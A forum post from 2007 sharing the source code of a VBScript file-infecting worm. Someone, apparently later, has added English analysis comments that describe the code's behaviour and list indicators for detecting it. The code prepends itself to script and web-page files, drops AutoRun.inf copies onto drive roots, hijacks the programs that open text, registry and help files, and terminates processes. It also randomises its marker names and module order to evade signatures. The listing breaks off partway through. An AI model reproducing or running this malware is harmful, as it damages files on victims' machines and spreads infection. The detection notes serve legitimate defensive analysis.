
标题: 一个VBS病毒的源码

作者: novaa    时间: 2007-11-5 22:47     标题: 一个VBS病毒的源码

  1. 'Administrator4
  2. 'FYCOKKOUFWQFE2_20
  3. Function GetModelCode(vbsCode, N_ModelCode)
         ' Analysis note: cuts one numbered module out of the script text vbsCode.
         ' A module is the span from the first ModelHead & "<d>_" & N_ModelCode marker
         ' through the end of the first ModelTail marker with the same suffix, where
         ' <d> is 1, 2 or 3 depending on how many decimal digits N_ModelCode has.
         ' ModelHead / ModelTail are script-level variables, not parameters.
         ' For N_ModelCode outside 1..999 no branch runs and the result stays Empty.
  4.     On Error Resume Next
  5.     Dim n, n1, buffer
  6.     buffer = vbsCode
  7.     If N_ModelCode>= 1 And N_ModelCode<= 9 Then
  8.         n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
  9.         n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
         ' Length runs from the head marker to the last character of the tail marker.
  10.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
  11.     ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
  12.         n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
  13.         n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
  14.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
  15.     ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
  16.         n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
  17.         n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
  18.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
  19.     End If
  20. End Function
  21. 'OJCQCFHDTCJ2_20
  22. 'FYCOKKOUFWQFE2_19
  23. Function GetVersion(objfso, path_v)
         ' Analysis note: reads the file at path_v and returns the single character
         ' that immediately follows the first occurrence of Head_V, which the sample
         ' treats as the version of the copy stored in that file.
         ' Head_V is a script-level variable; its value comes from GetHeadTail(0),
         ' which is not part of this listing.
         ' The file is opened read-only (mode 1) and is not closed here.
  24.     Dim FV, buffer
  25.     Set FV = objfso.OpenTextFile(path_v, 1)
  26.     buffer = FV.ReadAll()
  27.     GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
  28. End Function
  29. Function GetScriptCode(Languages)
         ' Analysis note: used when the code runs inside an HTML/HTA document.
         ' Walks document.Scripts and returns the Text of the first script element
         ' whose lower-cased Language attribute equals Languages and is either
         ' "vbscript" or "javascript". Returns Empty when nothing matches.
         ' Errors (for example, no document object under WScript) are suppressed.
  30.     On Error Resume Next
  31.     Dim soj
  32.     For Each soj In document.Scripts
  33.         If LCase(soj.Language) = Languages Then
  34.             Select Case LCase(soj.Language)
  35.                 Case "vbscript"
  36.                     GetScriptCode = soj.Text
  37.                     Exit Function
  38.                 Case "javascript"
  39.                     GetScriptCode = soj.Text
  40.                     Exit Function
  41.             End Select
  42.         End If
  43.     Next
  44. End Function
  45. Function GetSelfCode(objfso, FullPath_Self)
         ' Analysis note: reads the file at FullPath_Self and returns only the part
         ' that belongs to the sample: from the first Head_V marker through the last
         ' Tail_V marker (the length expression takes one extra character after it).
         ' Any host content before or after that span is left out.
         ' Head_V / Tail_V are script-level variables set outside this function.
  46.     On Error Resume Next
  47.     Dim n, n1, buffer, Self
  48.     Set Self = objfso.OpenTextFile(FullPath_Self, 1)
  49.     buffer = Self.ReadAll
  50.     n = InStr(buffer, Head_V)
  51.     n1 = InstrRev(buffer, Tail_V)
  52.     buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
  53.     GetSelfCode = buffer
  54.     Self.Close
  55. End Function
  56. Function GetMainBody(vbsCode, Sum_ModelCode)
         ' Analysis note: concatenates modules 2..Sum_ModelCode extracted from vbsCode,
         ' each surrounded by CRLF. Module 1 is skipped on purpose: the callers in this
         ' listing prepend their own first module via VirusHead / VictimHead / WebHead.
         ' The parameter Sum_ModelCode shadows the script-level variable of that name.
  57.     Dim i
  58.     For i = 2 To Sum_ModelCode
  59.         GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
  60.     Next
  61. End Function
  62. 'OJCQCFHDTCJ2_19
  63. 'FYCOKKOUFWQFE1_2
  64. Sub ExeVbs_WebPage()
         ' Analysis note: entry point for a copy embedded in an HTML/HTA/ASP page.
         ' It takes the VBScript text of the hosting page, rebuilds a standalone copy
         ' with the VirusHead prologue, reorders the modules and hands the result to
         ' InvadeSystem, which installs it on the local machine.
         ' GetFSOName is not part of this listing; presumably it returns the ProgID of
         ' the FileSystemObject - confirm against the full sample.
  65.     On Error Resume Next
  66.     Dim objfso, vbsCode, VbsCode_Virus
  67.     Set objfso = CreateObject(GetFSOName())
  68.     vbsCode = GetScriptCode("vbscript")
  69.     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  70.     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  71.     Call InvadeSystem(objfso, VbsCode_Virus)
  72.     Set objfso = Nothing
  73. End Sub
  74. Sub ExeVbs_Victim()
         ' Analysis note: entry point for a copy prepended to an existing .vbs file.
         ' It reads its own code from the running script file, rebuilds a standalone
         ' copy with the VirusHead prologue, reorders the modules, installs it through
         ' InvadeSystem and then starts the installed copy at FullPath_V1.
         ' Observable effect: a wscript/cscript process running a user script starts a
         ' second script located at FullPath_V1.
  75.     On Error Resume Next
  76.     Dim objfso, vbsCode, VbsCode_Virus
  77.     Set objfso = CreateObject(GetFSOName())
  78.     vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
  79.     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  80.     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  81.     Call InvadeSystem(objfso, VbsCode_Virus)
  82.     Call Run(FullPath_V1)
  83.     Set objfso = Nothing
  84. End Sub
  85. 'OJCQCFHDTCJ1_2
  86. 'FYCOKKOUFWQFE2_26
  87. Sub Run(ExeFullName)
         ' Analysis note: starts the command line in ExeFullName through
         ' WScript.Shell.Run with default window style and without waiting.
         ' Every process launch made by this sample goes through here or through
         ' KillProcess, so child processes have wscript.exe/cscript.exe as parent.
  88.     Dim WshShell
  89.     Set WshShell = WScript.CreateObject("WScript.Shell")
  90.     WshShell.Run ExeFullName
  91.     Set WshShell = Nothing
  92. End Sub
  93. Sub CopyFile(objfso, code, pathf)
         ' Analysis note: despite the name this does not copy a file; it writes the
         ' string in code to pathf. Mode 2 opens for writing and the third argument
         ' (true) creates the file if it is missing. Errors are suppressed and the
         ' text stream is not closed explicitly.
  94.     On Error Resume Next
  95.     Dim vf
  96.     Set vf = objfso.OpenTextFile(pathf, 2, true)
  97.     vf.Write code
  98. End Sub
  99. Function ChangeName(vbsCode, Names)
         ' Analysis note: for every string in Names, generates a random string of the
         ' same length made of upper-case letters A-Z and replaces all occurrences in
         ' vbsCode with it. The caller in this listing passes the two module-marker
         ' names, so the marker identifiers differ from one generated copy to the next.
         ' For detection this means the literal marker names seen in this listing are
         ' not stable across copies; the marker layout (comment line, name, digit-count
         ' prefix, underscore, module number) is what stays constant.
  100.     Dim Name, j, temp, buffer
  101.     buffer = vbsCode
  102.     Randomize
  103.     For Each Name in Names
  104.         temp = ""
  105.         For j = 1 To Len(Name)
          ' Int(Rnd * 26) + 65 yields character codes 65..90, i.e. "A".."Z".
  106.             temp = temp & Chr((Int(Rnd * 26) + 65))
  107.         Next
  108.         buffer = Replace(buffer, Name, temp)
  109.     Next
  110.     ChangeName = buffer
  111. End Function
  112. 'OJCQCFHDTCJ2_26
  113. 'FYCOKKOUFWQFE2_24
  114. Sub KillProcess(ProcessNames)
          ' Analysis note: terminates every running process whose image name is in
          ' ProcessNames. It queries Win32_Process over WMI on the local machine and
          ' calls Terminate on each match. When Terminate returns 2 (documented for
          ' Win32_Process.Terminate as "access denied" - confirm), it falls back to
          ' running "cmd.exe /c @tskill <name without the 4-character extension>"
          ' in a hidden window (window style 0) without waiting.
          ' strComputer, objWMIServices, colProcessList, ProcessName and objProcess
          ' are not declared here, so they are script-level variables.
          ' Observable effect: wscript.exe/cscript.exe issuing WMI terminate calls and
          ' spawning hidden cmd.exe with tskill.
  115.     On Error Resume Next
  116.     Dim objShell, intReturn, name_exe
  117.     Set objShell = WScript.CreateObject("WScript.Shell")
  118.     strComputer = "."
  119.     Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  120.     For Each ProcessName in ProcessNames
  121.         Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
  122.         For Each objProcess in colProcessList
  123.             intReturn = objProcess.Terminate
  124.             Select Case intReturn
  125.                 Case 2
  126.                     name_exe = objProcess.Name
  127.                     name_exe = Left(name_exe, Len(name_exe) -4)
  128.                     objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
  129.             End Select
  130.         Next
  131.     Next
  132.     Set objShell = Nothing
  133. End Sub
  134. 'OJCQCFHDTCJ2_24
  135. 'FYCOKKOUFWQFE2_21
  136. Function IsSexFile(fname)
          ' Analysis note: returns True when fname contains any of a fixed list of
          ' Chinese adult-content keywords, otherwise False. No caller of this
          ' function appears in this part of the listing, so how the result is used
          ' cannot be determined from here.
  137.     IsSexFile = False
  138.     If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
  139.                 InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
  140.                 InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
  141.         IsSexFile = True
  142.     End If
  143. End Function
  144. Function Isinfected(buffer, ftype)
          ' Analysis note: infection check used before a file is modified.
          ' For the extensions hta, htm, html, asp and vbs the file counts as
          ' infected when its content (buffer) contains Head_V. Every other
          ' extension is reported as infected, which makes callers skip it.
          ' The check is a plain substring test on the Head_V marker.
  145.     Isinfected = True
  146.     Select Case ftype
  147.         Case "hta", "htm" , "html" , "asp", "vbs"
  148.             If InStr(buffer, Head_V) = 0 Then
  149.                 Isinfected = False
  150.             End If
  151.         Case Else
  152.             Isinfected = True
  153.     End Select
  154. End Function
  155. 'OJCQCFHDTCJ2_21
  156. 'FYCOKKOUFWQFE2_12
  157. Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
          ' Analysis note: modifies one file at strPath. fi is the file object (only
          ' its Size is read), ftype the extension, T the mode:
          '   T = 0  prepend the sample's code to the file;
          '   T = 1  strip the sample's code from the file.
          ' Files of 350000 bytes or more are left alone. Errors are suppressed.
          ' n and Cnt are not declared here; they are script-level variables, and
          ' Cnt counts the files modified in mode 0.
          ' Forensic consequence of mode 0: the original content is preserved after
          ' the inserted block, so an affected file starts with the Head_V marker.
  158.     On Error Resume Next
  159.     Dim tso, buffer, strCode , Maxsize
  160.     Maxsize = 350000
  161.     If fi.Size< Maxsize Then
  162.         Set tso = objfso.OpenTextFile(strPath, 1, True)
  163.         buffer = tso.ReadAll()
  164.         tso.Close
  165.         If T = 0 Then
  166.             Select Case ftype
  167.                 Case "hta", "htm", "html", "asp"
          ' Web-type files get the code wrapped in a SCRIPT element (MakeScript).
  168.                     If Isinfected(buffer, ftype) = False Then
  169.                         Set tso = objfso.OpenTextFile(strPath, 2, true)
  170.                         strCode = MakeScript(VbsCode_WebPage, 0)
  171.                         tso.Write strCode & VBCRLF & buffer
  172.                         Cnt = Cnt + 1
  173.                     End If
  174.                 Case "vbs"
          ' Script files get the raw code; the first "Option Explicit" of the host
          ' script is removed (text compare) before the combined text is written.
  175.                     If Isinfected(buffer, ftype) = False Then
  176.                         n = InStr(buffer , "Option Explicit")
  177.                         If n<>0 Then
  178.                             buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
  179.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  180.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  181.                             Cnt = Cnt + 1
  182.                         Else
  183.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  184.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  185.                             Cnt = Cnt + 1
  186.                         End If
  187.                     End If
  188.                 Case Else
  189.                     '
  190.                     '
  191.             End Select
  192.         ElseIf T = 1 Then
          ' Removal mode. Replace with a start position returns only the text from
          ' that position onward, so buffer becomes whatever follows the last Tail_V
          ' marker. strCode is never assigned on this path, so the file is rewritten
          ' as an empty string, a CRLF and that remainder. A removed "Option Explicit"
          ' is not put back.
  193.             If Isinfected(buffer, ftype) = True Then
  194.                 n = InStrRev(buffer , Tail_V)
  195.                 If n<>0 Then
  196.                     buffer = Replace(buffer, Tail_V, "", n, 1, 1)
  197.                     Set tso = objfso.OpenTextFile(strPath, 2, True)
  198.                     tso.Write strCode & VBCRLF & buffer
  199.                 End If
  200.             End If
  201.         End If
  202.     End If
  203. End Sub
  204. 'OJCQCFHDTCJ2_12
  205. 'FYCOKKOUFWQFE1_3
  206. Sub ExeVbs_Virus()
          ' Analysis note: main dispatcher of the installed copy. All command-line
          ' arguments are joined into Para_V and the last three characters, lower-cased,
          ' select the behaviour:
          '   "run"               started from AutoRun.inf (argument "AutoRun")
          '   "txt" "log" "reg"   started through a hijacked file association; the
          '   "chm" "hlp"         argument is the path of the file the user opened
          '   anything else       normal start (for example from the Load value)
          ' In the association and AutoRun cases the expected program is launched first
          ' so the user sees normal behaviour, then the copy is rebuilt, reinstalled
          ' through InvadeSystem and the installed copy at FullPath_V1 is started.
          ' Names holds the two marker names that ChangeName randomises per copy.
          ' Observable effect: wscript.exe launching notepad.exe, regedit.exe, hh.exe or
          ' winhlp32.exe with a document path, followed by another wscript.exe start.
  207.     On Error Resume Next
  208.     Dim objfso, objshell, FullPath_Self, Name_Self, Names
  209.     Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
  210.     Dim Order, Order_Order, Order_Para
  211.     Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
  212.     Set objfso = CreateObject(GetFSOName())
  213.     Set objshell = CreateObject("WScript.Shell")
  214.     FullPath_Self = WScript.ScriptFullName
  215.     Name_Self = WScript.ScriptName
  216.     Names = Array("FYCOKKOUFWQFE", "OJCQCFHDTCJ")
  217.     Set oArgs = WScript.Arguments
  218.     ArgNum = 0
  219.     Do While ArgNum < oArgs.Count
  220.         Para_V = Para_V & " " & oArgs(ArgNum)
  221.         ArgNum = ArgNum + 1
  222.     Loop
  223.     SubPara_V = LCase(Right(Para_V, 3))
  224.     Select Case SubPara_V
  225.         Case "run"
          ' Left(FullPath_Self, 2) is the drive prefix of the running copy (such as
          ' "E:"); running it presumably opens that drive for the user - confirm.
  226.             RunPath = Left(FullPath_Self, 2)
  227.             Call Run(RunPath)
  228.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  229.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  230.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  231.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  232.             Call InvadeSystem(objfso, VbsCode_Virus)
  233.             Call Run(FullPath_V1)
  234.         Case "txt", "log"
  235.             RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
  236.             Call Run(RunPath)
  237.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  238.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  239.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  240.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  241.             Call InvadeSystem(objfso, VbsCode_Virus)
  242.             Call Run(FullPath_V1)
  243.         Case "reg"
  244.             Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
  245.             Call Run(Para_V)
  246.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  247.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  248.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  249.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  250.             Call InvadeSystem(objfso, VbsCode_Virus)
  251.             Call Run(FullPath_V1)
  252.         Case "chm"
  253.             Para_V = "hh.exe " & """" & Trim(Para_V) & """"
  254.             Call Run(Para_V)
  255.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  256.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  257.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  258.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  259.             Call InvadeSystem(objfso, VbsCode_Virus)
  260.             Call Run(FullPath_V1)
  261.         Case "hlp"
  262.             Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
  263.             Call Run(Para_V)
  264.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  265.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  266.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  267.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  268.             Call InvadeSystem(objfso, VbsCode_Virus)
  269.             Call Run(FullPath_V1)
  270.         Case Else
          ' Normal start. Quit if another wscript/cscript instance of this script is
          ' already running (PreInstance).
  271.             If PreInstance = True Then
  272.                 WScript.Quit
  273.             End If
          ' IsOK is True when the config file already carries today's date; in that
          ' case only the monitoring loop runs (Else branch further down). Otherwise
          ' the config file is read as "<order>@<parameter>" and the order is acted on.
  274.             If IsOK(objfso, Date(), FullPath_Config) = False Then
  275.                 If objfso.FileExists(FullPath_Config) = True Then
  276.                     Order = Trim(ReadOK(objfso, FullPath_Config))
  277.                     Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
  278.                     Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
  279.                 End If
  280.                 Select Case Order_Order
  281.                 Case "InfectFiles"
          ' Builds the three variants (web page, victim script, standalone), runs
          ' the file search in mode 0 and adds this run's Cnt to the stored total.
  282.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  283.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  284.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  285.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  286.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  287.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  288.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  289.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  290.                     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
  291.                     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  292.                     VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  293.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  294.                     Order_Para = Order_Para + Cnt
  295.                     If Order_Para>2000 Then
          ' The stored message reads, in English: "More than 2000 of your files
          ' have been infected! But don't worry, this virus is easy to remove!
          ' Please contact 418465***-_- !". It is shown by the "Msg" order later.
  296.                         Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !")
  297.                     Else
  298.                         Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
  299.                     End If
  300.                     Call InvadeSystem(objfso, VbsCode_Virus)
  301.                     Call MonitorSystem(objfso, VbsCode_Virus)
  302.                 Case "Msg"
          ' Shows the stored parameter in a message box, clears the order, then
          ' reinstalls and enters the monitoring loop.
  303.                     MsgBox Order_Para
  304.                     Call WriteOK(objfso, FullPath_Config, "", "")
  305.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  306.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  307.                     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
  308.                     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  309.                     VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  310.                     Call InvadeSystem(objfso, VbsCode_Virus)
  311.                     Call MonitorSystem(objfso, VbsCode_Virus)
  312.                 Case "UnLoadMe"
          ' Built-in uninstall of the system changes only (RestoreSystem).
  313.                     Call RestoreSystem(objfso)
  314.                     Wscript.Quit
  315.                 Case "KillVirus"
          ' Built-in uninstall plus the file search in mode 1 (removal). The two
          ' code arguments are still Empty on this path.
  316.                     Call RestoreSystem(objfso)
  317.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
  318.                     Wscript.Quit
  319.                 Case Else
          ' No recognised order (including a missing config file): same work as
          ' "InfectFiles", but the stored count starts from this run's Cnt.
  320.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  321.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  322.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  323.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  324.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  325.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  326.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  327.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  328.                     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
  329.                     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  330.                     VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  331.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  332.                     Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
  333.                     Call InvadeSystem(objfso, VbsCode_Virus)
  334.                     Call MonitorSystem(objfso, VbsCode_Virus)
  335.             End Select
  336.         Else
  337.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  338.             MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  339.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V 'build the complete code of the virus body
  340.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) 'change the order in which the modules are combined
  341.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names) 'change the module marker names
  342.             Call MonitorSystem(objfso, VbsCode_Virus)
  343.         End If
  344.     End Select
  345.     Set objfso = Nothing
  346.     Set objshell = Nothing
  347. End Sub
  348. 'OJCQCFHDTCJ1_3
  349. 'FYCOKKOUFWQFE2_14
  350. Function ReadOK(objfso, FullPath_OK)
          ' Analysis note: reads the config file at FullPath_OK and returns up to 50
          ' characters that follow the first "Order:" (6 characters long), with
          ' trailing spaces removed. The caller splits the result at "@" into an
          ' order name and a parameter. The file is not closed explicitly.
  351.     On Error Resume Next
  352.     Dim vf, buffer
  353.     Set vf = objfso.OpenTextFile(FullPath_OK, 1)
  354.     buffer = vf.ReadAll
  355.     ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
  356. End Function
  357. Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
          ' Analysis note: recreates the config file at FullPath_OK with three lines:
          '   OK
          '   <current date as returned by Date()>
          '   Order:<Order_Order>@<Order_Para>
          ' and then calls SetFileAttr on it. SetFileAttr is not part of this listing;
          ' presumably it sets hidden/system attributes - confirm.
          ' This three-line layout is what IsOK and ReadOK parse, and it is a usable
          ' content pattern when looking for the config file on disk.
  358.     On Error Resume Next
  359.     Dim vf1
  360.     objfso.DeleteFile FullPath_OK, True
  361.     Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
  362.     vf1.Write "OK" & VBCRLF
  363.     vf1.WriteLine Date()
  364.     vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
  365.     Call SetFileAttr(objfso, FullPath_OK)
  366. End Sub
  367. 'OJCQCFHDTCJ2_14
  368. 'FYCOKKOUFWQFE2_17
  369. Function PreInstance()
          ' Analysis note: single-instance check. Queries Win32_Process over WMI for
          ' cscript.exe and wscript.exe and counts those whose command line contains
          ' the full path of the running script. Returns True when the count is 2 or
          ' more, i.e. when a process other than the current one is already running
          ' this script. Errors are suppressed, in which case the result stays False.
  370.     On Error Resume Next
  371.     Dim num_cnt
  372.     Dim strComputer, objWMIService, colProcessList, objProcess
  373.     num_cnt = 0
  374.     PreInstance = False
  375.     strComputer = "."
  376.     Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  377.     Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
  378.     For Each objProcess in colProcessList
  379.         If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
  380.             num_cnt = num_cnt + 1
  381.         End If
  382.     Next
  383.     If num_cnt>= 2 Then
  384.         PreInstance = True
  385.     End If
  386. End Function
  387. 'OJCQCFHDTCJ2_17
  388. 'FYCOKKOUFWQFE2_18
  389. Function IsOK(objfso, Now_V, path_f)
          ' Analysis note: reads the first three lines of the config file at path_f.
          ' Returns True when line 1 is "OK" and line 2 equals Now_V (both compared
          ' case-insensitively); the caller passes Date(), so True means "the file was
          ' already written today". A missing file leaves the result False because
          ' errors are suppressed.
          ' A third line equal to "Admin" is an author test switch: it shows a message
          ' box, then an input box whose prompt reads, in English, "0: exit;
          ' 1: monitor system; 2: infect files" (title: "SuperVirus script test!"),
          ' and sets the result from the answer. n is not declared here.
  390.     On Error Resume Next
  391.     Dim vf, p1, p2, p3
  392.     IsOK = False
  393.     Set vf = objfso.OpenTextFile(path_f, 1)
  394.     p1 = Trim(vf.ReadLine)
  395.     p2 = Trim(vf.ReadLine)
  396.     p3 = Trim(vf.ReadLine)
  397.     If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
  398.         IsOK = True
  399.     End If
  400.     If p3 = "Admin" Then
  401.         MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
  402.         IsOK = True
  403.         n = InputBox("0:退出; 1:监视系统; 2:传染文件", "SuperVirus脚本测试!")
  404.         If n = 0 Then
  405.             Wscript.Quit
  406.         ElseIf n = 1 Then
  407.             IsOK = True
  408.         ElseIf n = 2 Then
  409.             IsOK = False
  410.         End If
  411.     End If
  412. End Function
  413. 'OJCQCFHDTCJ2_18
  414. 'FYCOKKOUFWQFE1_6
  415. Sub AutoRun(objfso, D, vbsCode)
          ' Analysis note: places a copy of the script and an AutoRun.inf in the root
          ' of drive letter D. It acts when either file is missing or when the copy
          ' found there reports a version lower than Version; existing files are
          ' deleted first. Both files are passed to SetFileAttr (not in this listing).
          ' The generated AutoRun.inf sets Shellexecute and two shell verbs, labelled
          ' in Chinese "Open (&O)" and "Explorer (&X)", all to
          '   WScript.exe <Name_V1> "AutoRun"
          ' Indicators: an AutoRun.inf in a drive root whose commands invoke
          ' WScript.exe on a .vbs in the same root with the argument "AutoRun".
          ' Name_V1 and Version are script-level variables.
  416.     On Error Resume Next
  417.     Dim path_autorun, path_vbs, inf_autorun
  418.     path_autorun = D & ":\AutoRun.inf"
  419.     path_vbs = D & ":\" & Name_V1
  420.     If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)<Version Then
  421.         If objfso.FileExists(path_autorun) = True Then
  422.             objfso.DeleteFile path_autorun, True
  423.         End If
  424.         If objfso.FileExists(path_vbs) = True Then
  425.             objfso.DeleteFile path_vbs, True
  426.         End If
  427.         Call CopyFile(objfso, vbsCode, path_vbs)
  428.         Call SetFileAttr(objfso, path_vbs)
  429.         inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun=打开(&O)" & VBCRLF & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun1=资源管理器(&X)" & VBCRLF & "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
  430.         Call CopyFile(objfso, inf_autorun, path_autorun)
  431.         Call SetFileAttr(objfso, path_autorun)
  432.     End If
  433. End Sub
  434. 'OJCQCFHDTCJ1_6
  435. 'FYCOKKOUFWQFE1_9
  436. Function ChangeModelOrder(vbsCode, Num_DNA)
          ' Analysis note: returns the script text with its Num_DNA modules in a
          ' random order. Steps visible below:
          '   1. fill DNA(1..Num_DNA) with a random permutation of 1..Num_DNA by
          '      drawing values until one is found that is not yet in DNA;
          '   2. extract every module from vbsCode with GetModelCode;
          '   3. join the modules in permuted order and wrap them as
          '      Head_V & Version ... Tail_V.
          ' Only the module spans are taken from the input, so text outside the
          ' module markers is not carried over.
          ' For detection: module order differs between copies, so byte-offset or
          ' whole-file hash matching does not hold across copies.
